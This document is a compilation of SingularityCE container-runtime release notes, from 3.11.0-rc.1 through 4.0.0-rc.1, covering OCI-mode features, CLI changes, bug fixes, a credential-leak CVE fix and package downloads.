SingularityCE 4.0.0 Release Candidate 1

SingularityCE 4.0.0-rc.1 is a release candidate for the upcoming 4.0.0 release, with changes detailed below.

OCI-mode

Singularity 4 introduces OCI-mode as a fully supported feature. It is enabled by using the --oci flag with the run / shell / exec / pull commands, or by setting oci mode = yes in singularity.conf.

In OCI-mode:

• Container images from OCI sources will be pull-ed to an OCI-SIF file. An OCI-SIF file encapsulates the OCI image configuration and squashed filesystem using an OCI, rather than Singularity specific, structure.
• The run / shell / exec commands use a low-level OCI runtime (crun/runc) for container execution.
• Default operation is compatible with other OCI tools, similar to using --compat in Singularity's non-OCI native mode.
• OCI-modes support running existing Singularity non-OCI-SIF images, and can be made to imitate native mode default behavior by using the --no-compat flag.

OCI-mode changes from 3.11 to 4.0 include:

• run / shell / exec in OCI-mode now includes support for the following existing CLI flags:
  • --add-caps
  • --drop-caps
  • --keep-privs
  • --no-privs
  • --overlay from directories, bare squashfs and extfs images.
  • --workdir
  • --scratch
  • --no-home
  • --no-mount (dev cannot be disabled in OCI mode)
  • --no-umask (with --no-compat)
  • --writable-tmpfs (with --no-compat)
• Added --device flag to "action" commands (run/exec/shell) when run in OCI mode (--oci). Currently supports passing one or more (comma-separated) fully-qualified CDI device names, and those devices will then be made available inside the container.
• Added --cdi-dirs flag to override the default search locations for CDI json files, allowing, for example, users who don't have root access on their host machine to nevertheless create CDI mappings (into containers run with --fakeroot, for example).
• A container run as root, or with --fakeroot, has OCI default effective/permitted capabilities.
• An --env-file is evaluated with respect to the host environment, to match native mode behaviour.
• If the kernel does not support unprivileged overlays, OCI-mode will attempt to use fuse-overlayfs and fusermount for overlay mounting and unmounting.
• Support for thee SINGULARITY_CONTAINLIBS env var, to specify libraries to bind into /.singularity.d/libs/ in the container.
• Support for running OCI-SIF images directly from docker://, http://, https:// and oras:// URIs.
• A new --no-compat flag can be used with OCI-mode to mirror singularity's historic native mode behavior on a variety of settings, instead of setting them the way other OCI runtimes typically do:
  • $HOME, /tmp, /var/tmp are bind mounted from the host.
  • The full /dev is bind mounted from the host, unless mount dev = minimal in singularity.conf (requires crun, not applied with runc).
  • bind path entries in singularity.conf are mounted into the container.
  • The current working directory is mounted into the container, and is the entry point into the container.
  • The container is read-only unless --writable-tmpfs is also used.
  • The host umask is propagated into the container, unless --no-umask is also used.
  • When a native (non-OCI-SIF) image is run in OCI-mode, environment variables will be shell evaluated on container startup.
• The pull command now accepts a new flag --oci for OCI image sources. This will create an OCI-SIF image rather than convert to Singularity's native container format.
• OCI-SIF containers can be pushed/pulled to/from OCI registries as single file artifacts using oras:// URIs.
• OCI-SIF containers can be pushed/pulled to/from registries as OCI images, with a single squashfs layer, using docker:// URIs.
• A new oci mode directive in singularity.conf can be set to true to enable OCI-mode by default. It can be negated with a new --no-oci command line flag.

See the admin guide and user guide for full requirements of OCI-mode and usage information.

Changed defaults / behaviours

Packages / Requirements

• RPM packages now use /var/lib/singularity (rather than /var/singularity) to store local state files.
• Bash completions are now install to the modern share/bash-completion/completions location, rather than under etc.
• The --vm and related flags to start singularity inside a VM have been removed. This functionality was related to the retired Singularity Desktop / SyOS projects.
• Singularity uses squashfuse_ll / squashfuse, which is now built from a git submodule unless --without-squashfuse is specified as an argument to mconfig. When built with --without-squashfuse, squashfuse_ll or squashfuse will be located on PATH. Version 0.2.0 or later is required.

CLI

• The commands related to OCI/Docker registries that were under remote have been moved to their own, dedicated registry command. Run singularity help registry for more information.
• The remote list subcommand now outputs only remote endpoints (with keyservers and OCI/Docker registries having been moved to separate commands), and the output has been streamlined.
• Adding a new remote endpoint using the singularity remote add command will now set the new endpoint as default. This behavior can be suppressed by supplying the --no-default (or -n) flag to remote add.
• The keyserver-related commands that were under remote have been moved to their own, dedicated keyserver command. Run singularity help keyserver for more information.
• Improved the clarity of singularity key list output.
• --cwd is now the preferred form of the flag for setting the container's working directory, though --pwd is still supported for compatibility.

Runtime Behaviour

• The way --home is handled when running as root (e.g. sudo singularity) or with --fakeroot has changed. Previously, we were only modifying the HOME environment variable in these cases, while leaving the container's /etc/passwd file unchanged (with its homedir field pointing to /root, regardless of the value passed to --home). With this change, both the value of HOME and the contents of /etc/passwd in the container will reflect the value passed to --home.
• Bind mounts are now performed in the order of their occurrence on the command line, or within the value of the SINGULARITY_BIND environment variable. (Previously, image-mounts were always performed first, regardless of order.)
• Default OCI config generated with singularity mount no longer sets any inheritable / ambient capabilites, matching other OCI runtimes.
• singularity oci mount now uses, and requires, squashfuse_ll or squashfuse to mount a SIF image to an OCI bundle. Note that squashfuse_ll is built with singularity unless --without-squashfuse is passed to mconfig.
• The current working directory is created in the container when it doesn't exist, so that it can be entered. You must now specify --no-mount home,cwd instead of just --no-mount home to avoid mounting from $HOME if you run singularity from inside $HOME.
• If the path of the current working directory in the container and on the host contain symlinks to different locations, it will not be mounted.

New Features & Functionality

• Templating support for definition files: users can now define variables in definition files via a matching pair of double curly brackets. Variables of the form {{ variable }} will be replaced by a value defined either by a variable=value entry in the %arguments section of the definition file, or through new build options --build-arg or --build-arg-file.
• Added --secret flag (shorthand: -s) to key remove subcommand, to allow removal of a private key by fingerprint.
• Added --private as a synonym for --secret in key list, key export, and key remove subcommands.
• The remote status command will now print the username, realname, and email of the logged-in user, if available.
• The cache commands now accept --type oci-sif to list and clean cached OCI-SIF image conversions of OCI sources.
• The instance start command now accepts an optional --app <name> argument which invokes start script within the %appstart <name> section in the definition file. The instance stop command still only requires the instance name.
• A new --no-pid flag for singularity run/shell/exec disables the PID namespace inferred by --containall and --compat.
• A new --platform flag can be used to specify an OS/Architecture[/Variant] when pulling images from OCI or library sources. When pulling from library sources the optional variant is ignored.
• The --arch flag can now be used to specify a required architecture when pulling images from OCI, as well as library sources.

Developer / API

• Support for image driver plugins, deprecated at 3.11, has been removed. Unprivileged kernel overlay is supported without a plugin. In
  singularity.conf, the image driver directive has been removed, and enable overlay no longer supports the driver option.
• Changes in pkg/build/types.Definition struct. New .FullRaw field introduced, which always contains the raw data for the entire definition file. Behavior of .Raw field has changed: for multi-stage builds parsed with pkg/build/types/parser.All(), .Raw contains the raw content of a single build stage. Otherwise, it is equal to .FullRaw.
• The SingularityCE go module is now github.com/sylabs/singularity/v4, reflecting the major version of the application.

Bug Fixes

• Fix interaction between --workdir when given relative path and --scratch.
• Set correct $HOME in --oci mode when mount home = no in singularity.conf.
• Lookup a...

SingularityCE 3.11.4

SingularityCE 3.11.4 is a patch release in the 3.11 series, with changes detailed below.

Changed defaults / behaviours

• Add xino=on mount option for writable kernel overlay mount points to fix inode numbers consistency after kernel cache flush.

New Features & Functionality

• The tap CNI plugin, new to github.com/containernetworking/plugins v1.3.0, is now provided.
• Added remote get-login-password subcommand that allows the user to retrieve a CLI token to interact with the OCI registry of a
  Singularity Enterprise instance.
• Added --no-setgroups flag for --fakeroot builds and run/shell/exec. This prevents the setgroups syscall being used on the container process in the fakeroot user namespace. Maintains access from within the user namespace to files on the host that have permissions based on supplementary group membership. Note that supplementary groups are mapped to nobody in the container, and chgrp, newgrp, etc. cannot be used.
• Added ability to set a custom user config directory (default $HOME/.singularity) via the new SINGULARITY_CONFIGDIR environment variable.

Bug Fixes

• In --oci mode, do not attempt to use unprivileged overlay on systems that do not support it.
• Fix dropped "n" characters on some platforms in definition file stored as part of SIF metadata.
• Pass STDIN to --oci containers correctly, to fix piping input to a container.
• Fix compilation on 32-bit systems.
• Fix seccomp filters to allow mknod/mknodat syscalls to create pipe/socket and character devices with device number 0 for fakeroot builds.
• Fix freeze when copying files between stages in an unprivileged proot build.
• Fix non-POSIX sh operator in mconfig.
• Correct internal name for CAP_BLOCK_SUSPEND.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.4.tar.gz download below to obtain and install SingularityCE 3.11.4. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.5

SingularityCE 3.11.3

SingularityCE 3.11.3 is a patch release in the 3.11 series, with changes detailed below.

Changed defaults / behaviours

• --oci mode now provides a writable container by default, using a tmpfs overlay. This improves parity with --compat mode in the native runtime, as --compat enables --writable-tmpfs.

Bug Fixes

• Ensure the allow kernel squashfs directive in singularity.conf applies to encrypted squashfs filesystems in a SIF.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.3.tar.gz download below to obtain and install SingularityCE 3.11.3. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.4

SingularityCE 3.11.2

SingularityCE 3.11.2 is a patch release in the 3.11 series, with changes detailed below.

New Features & Functionality

• OCI mode now supports --hostname (requires UTS namespace, therefore this flag will infer --uts).
• OCI mode now supports --scratch (shorthand: -S) to mount a tmpfs scratch directory in the container.
• Support --pwd in OCI mode.
• OCI mode now supports --home. Supplying a single location (e.g. --home /myhomedir) will result in a new tmpfs directory being created at the specified location inside the container, and that dir being set as the in-container user's home dir. Supplying two locations separated by a colon (e.g. --home /home/user:/myhomedir) will result in the first location on the host being bind-mounted as the second location in-container, and set as the in-container user's home dir.
• OCI mode now handles --dns and resolv.conf on par with native mode: the --dns flag can be used to pass a comma-separated list of DNS servers that will be used in the container; if this flag is not used, the container will use the same resolv.conf settings as the host.
• Added allow kernel squashfs directive to singularity.conf. Defaults to yes. When set to no, Singularity will not mount squashfs filesystems using the kernel squashfs driver.
• Added allow kernel extfs directive to singularity.conf. Defaults to yes. When set to no, Singularity will not mount extfs filesystems using the kernel extfs driver.

Bug Fixes

• Require runc in RPM packages built on SLES, not crun, because crun is part of the Package Hub community repository that may not be enabled. SingularityCE will still prefer crun if it has been installed.
• Use /dev/loop-control for loop device creation, to avoid issues with recent kernel patch where max_loop is not set.
• Always request inner userns in --oci mode without --fakeroot, so that inner id mapping is applied correctly.
• Use correct target uid/gid for inner id mappings in --oci mode.
• Avoid runc cgroup creation error when using --oci from a root-owned cgroup (e.g. ssh login session scope).
• Pass host's TERM environment variable to container in OCI mode. Can be overridden by setting SINGULARITYENV_TERM on host.
• Honour config passwd and config group directives from singularity.conf in --oci mode.
• Honour mount proc / mount sys / mount tmp / mount home directives from singularity.conf in --oci mode.
• Corrected singularity.conf comment, to refer to correct file as source of default capabilities when root default capabilities = file.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.2.tar.gz download below to obtain and install SingularityCE 3.11.2. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.3

SingularityCE 3.11.1

SingularityCE 3.11.1 is a bugfix patch release in the 3.11 series, with changes detailed below.

New Features & Functionality

• Add setopt definition file header for the yum bootstrap agent. The setopt value is passed to yum / dnf using the --setopt flag. This permits setting e.g. install_weak_deps=False to bootstrap recent versions of Fedora, where systemd (a weak dependency) cannot install correctly in the container. See examples/Fedora for an example defintion file.
• Warn user that a yum bootstrap of an older distro may fail if the host rpm _db_backend is not bdb.

Bug Fixes

• Fix implied --writable-tmpfs with --nvccli, to avoid r/o filesytem error.
• Avoid incorrect error when requesting fakeroot network.
• Pass computed LD_LIBRARY_PATH to wrapped unsquashfs. Fixes issues where unsquashfs on host uses libraries in non-default paths.
• Show correct memory limit in instance stats when a limit is set.
• Ensure consistent binding of libraries under --nv/--rocm when duplicate <library>.so[.version] files are listed by ldconfig -p.
• Fix systemd cgroup manager error when running a container as a non-root user with --oci, on systems with cgroups v1 and runc.
• Fix joining cgroup of instance started as root, with cgroups v1, non-default cgroupfs manager, and no device rules.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.1.tar.gz download below to obtain and install SingularityCE 3.11.1. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.20.2

SingularityCE 3.11.0

SingularityCE 3.11.0 is the first release in the 3.11 series, with changes, new features, and bug fixes detailed below.

Changed defaults / behaviours

• Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
• When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
• crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
• sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
• Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionality

Image Building

• Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
• Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
  • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
  • Do not support %pre and %setup sections.
  • Run the %post sections of a build in the container as an emulated root user.
  • Run the %test section of a build as the non-root user, like singularity test.
  • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of
    syscalls.
  • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

• Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
• A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
• Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

• --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
• Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

• Support for DOCKER_HOST parsing when using docker-daemon://
• DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
• A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
  • Runs OCI container images from an OCI bundle, using runc or crun.
  • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
  • Does not support running Singularity SIF, SquashFS, or EXT3 images.
  • Provides an environment similar to Singularity's native runtime, running with --compat.
  • Supports the following options / flags. Other options are not yet supported:
    • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
    • Bind mounts via --bind or --mount. No image mounts.
    • Additional namespaces requests with --net, --uts, --user.
    • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
    • --rocm to bind ROCm GPU libraries and devices into the container.
    • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
    • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

• The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
• The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
• The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain can also be specified via the --certificate-intermediates flag.
• Support for online verification checks of x509 certificates using OCSP protocol. (introduced flag: verify --ocsp-verify)

Other

• Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
• A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

• In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
• Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.
• Avoid UID / GID readonly var warnings with --env-file.

Development / Testing

• Significant reduction in the use of network image sources in the e2e tests.
• Improved parallelization and use of image caches in the e2e tests.
• The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end to end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end to end tests in the VERSION and HELP groups only.
• The e2e-test makefile target now accepts an argument E2E_TESTS which is a regular expression specifying the names of (top level) end to end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end to end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.0.tar.gz download below to obtain and install SingularityCE 3.11.0. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.5

SingularityCE 3.11.0 Release Candidate 2

This is the second release candidate for the upcoming Singularity 3.11.0 release. Users are encouraged to test and report any issues, but should use the stable 3.10 release for production deployments.

3.11.0 Release Candidate 2 [2023-02-02]

Bug Fixes

• Avoid UID / GID readonly var warnings with --env-file.
• Ensure proot flow does not override --remote build.

3.11.0 Release Candidate 1 [2023-01-11]

Changed defaults / behaviours

• Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
• When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
• crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
• sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
• Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionalities

Image Building

• Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
• Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
  • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
  • Do not support %pre and %setup sections.
  • Run the %post sections of a build in the container as an emulated root user.
  • Run the %test section of a build as the non-root user, like singularity test.
  • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of
    syscalls.
  • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

• Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
• A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
• Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

• --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
• Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

• Support for DOCKER_HOST parsing when using docker-daemon://
• DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
• A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
  • Runs OCI container images from an OCI bundle, using runc or crun.
  • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
  • Does not support running Singularity SIF, SquashFS, or EXT3 images.
  • Provides an environment similar to Singularity's native runtime, running with --compat.
  • Supports the following options / flags. Other options are not yet supported:
    • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
    • Bind mounts via --bind or --mount. No image mounts.
    • Additional namespaces requests with --net, --uts, --user.
    • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
    • --rocm to bind ROCm GPU libraries and devices into the container.
    • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
    • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

• The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
• The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
• The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain can also be specified via the --certificate-intermediates flag.
• Support for online verification checks of x509 certificates using OCSP protocol. (introduced flag: verify --ocsp-verify)

Other

• Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
• A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

• In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
• Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.

Development / Testing

• Significant reduction in the use of network image sources in the e2e tests.
• Improved parallelization and use of image caches in the e2e tests.
• The e2e-test makefile target now accepts an argument E2E_GROUPS to only run specified groups of end to end tests. E.g. make -C builddir e2e-test E2E_GROUPS=VERSION,HELP will run end to end tests in the VERSION and HELP groups only.
• The e2e-test makefile target now accepts an argument E2E_TESTS which is a regular expression specifying the names of (top level) end to end tests that should be run. E.g. make -C builddir e2e-test E2E_TESTS=^semantic will only run end to end tests with a name that begins with semantic. These E2E_ variables offer an alternative to the -run flag, which may be easier to use given the structure of e2e tests.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.11.0-rc.2.tar.gz download below to obtain and install SingularityCE 3.11.0-rc.2. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.3

SingularityCE 3.10.5

SingularityCE 3.10.5 is a security release in the 3.10 series.

We encourage all users to upgrade. Please see the details and CVE/GHSA link below for more information about the vulnerability.

Security Related Fixes

• CVE-2022-23538: The github.com/sylabs/scs-library-client dependency included in SingularityCE >=3.10.0, <3.10.5 may leak user credentials to a third-party service via HTTP redirect. This issue is limited to library:// access to specific Singularity Enterprise 1.x or 3rd party library configurations, which plement a concurrent multi-part download flow. Access to Singularity Enterprise 2.x, or Singularity Container Services (cloud.sylabs.io), does not trigger the vulnerable flow. See the linked advisory for full details.

Commit 7b841c5 updates the dependency, bringing in the fix.

Thanks / Reporting Bugs

Thanks to our contributors for code, feedback and, testing efforts!

As always, please report any bugs to: https://github.com/sylabs/singularity/issues/new

If you think that you've discovered a security vulnerability please report it to: security@sylabs.io

Have fun!

Downloads

Source Code

Please use the singularity-ce-3.10.5.tar.gz download below to obtain and install SingularityCE 3.10.5. The GitHub auto-generated 'Source Code' downloads do not include required dependencies etc.

Packages

RPM / DEB packages are provided for:

• Ubuntu 18.04 (bionic)
• Ubuntu 20.04 (focal)
• Ubuntu 22.04 (jammy)
• RHEL/CentOS 7 (el7)
• RHEL/CentOS/AlmaLinux/Rocky 8 (el8)
• RHEL/CentOS/AlmaLinux/Rocky 9 (el9)

These packages were built with Go 1.19.5

SingularityCE 3.11.0 Release Candidate 1

This is the first release candidate for the upcoming Singularity 3.11.0 release. Users are encouraged to test and report any issues, but should use the stable 3.10 release for production deployments.

Changed defaults / behaviours

• Image driver plugins, implementing the RegisterImageDriver callback, are deprecated and will be removed in 4.0. Support for the example plugin, permitting Ubuntu unprivileged overlay functionality, has been replaced with direct support for kernel unprivileged overlay.
• When the kernel supports unprivileged overlay mounts in a user namespace, the container will be constructed using an overlay instead of underlay layout.
• crun will be used as the low-level OCI runtime, when available, rather than runc. If crun is not available, runc will be used.
• sessiondir maxsize in singularity.conf now defaults to 64 MiB for new installations. This is an increase from 16 MiB in prior versions.
• Instances are started in a cgroup, by default, when run as root or when unified cgroups v2 with systemd as manager is configured. This allows singularity instance stats to be supported by default when possible.

New features / functionalities

Image Building

• Support for a custom hashbang in the %test section of a Singularity recipe (akin to the runscript and start sections).
• Non-root users can now build from a definition file, on systems that do not support --fakeroot. This requires the statically built proot command (https://proot-me.github.io/) to be available on the user PATH. These builds:
  • Do not support arch / debootstrap / yum / zypper bootstraps. Use localimage, library, oras, or one of the docker/oci sources.
  • Do not support %pre and %setup sections.
  • Run the %post sections of a build in the container as an emulated root user.
  • Run the %test section of a build as the non-root user, like singularity test.
  • Are subject to any restrictions imposed in singularity.conf. Incur a performance penalty due to proot's ptrace based interception of
    syscalls.
  • May fail if the %post script requires privileged operations that proot cannot emulate.

Instances

• Instances started by a non-root user can use --apply-cgroups to apply resource limits. Requires cgroups v2, and delegation configured via systemd.
• A new instance stats command displays basic resource usage statistics for a specified instance, running within a cgroup.
• Instance name is available inside an instance via the new SINGULARITY_INSTANCE environment variable.

Mounts & Overlays

• --writable-tmpfs is now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• The --no-mount flag now accepts the value bind-paths to disable mounting of all bind path entries in singularity.conf.
• Persistent overlays (--overlay) from a directory are now available when running unprivileged, or explicitly requesting a user namespace, on systems with a kernel that supports unprivileged overlay mounts in a user namespace.
• Add --sparse flag to overlay create command to allow generation of a sparse ext3 overlay image.

OCI / Docker Compatibility

• Support for DOCKER_HOST parsing when using docker-daemon://
• DOCKER_USERNAME and DOCKER_PASSWORD supported without SINGULARITY_ prefix.
• A new --oci flag for run/exec/shell enables the experimental OCI runtime mode. This mode:
  • Runs OCI container images from an OCI bundle, using runc or crun.
  • Supports docker://, docker-archive:, docker-daemon:, oci:, oci-archive: image sources.
  • Does not support running Singularity SIF, SquashFS, or EXT3 images.
  • Provides an environment similar to Singularity's native runtime, running with --compat.
  • Supports the following options / flags. Other options are not yet supported:
    • --fakeroot for effective root in the container. Requires subuid/subgid mappings.
    • Bind mounts via --bind or --mount. No image mounts.
    • Additional namespaces requests with --net, --uts, --user.
    • Container environment variables via --env, --env-file, and SINGULARITYENV_ host env vars.
    • --rocm to bind ROCm GPU libraries and devices into the container.
    • --nv to bind Nvidia driver / basic CUDA libraries and devices into the container.
    • --apply-cgroups, and the --cpu*, --blkio*, --memory*, --pids-limit flags to apply resource limits.

Signing & Verification

• The sign command now supports signing with non-PGP key material by specifying the path to a private key via the --key flag.
• The verify command now supports verification with non-PGP key material by specifying the path to a public key via the --key flag.
• The verify command now supports verification with X.509 certificates by specifying the path to a certificate via the --certificate flag. By default, the system root certificate pool is used as trust anchors unless overridden via the --certificate-roots flag. A pool of intermediate certificates that are not trust anchors, but can be used to form a certificate chain can also be specified via the --certificate-intermediates flag.
• Support for online verification checks of x509 certificates using OCSP protocol. (introduced flag: verify --ocsp-verify)

Other

• Add new Linux capabilities: CAP_PERFMON, CAP_BPF, CAP_CHECKPOINT_RESTORE.
• A new --reproducible flag for ./mconfig will configure Singularity so that its binaries do not contain non-reproducible paths. This disables plugin functionality.

Bug Fixes

• In --rocm mode, the whole of /dev/dri is now bound into the container when --contain is in use. This makes /dev/dri/render devices available, required for later ROCm versions.
• Overlay is blocked on the panfs filesystem, allowing sandbox directories to be run from panfs without error.

Development / Testing

• Significant reduction in the use of network image sources in the e2e tests.
• Improved parallelization and use of image caches in the e2e tests.
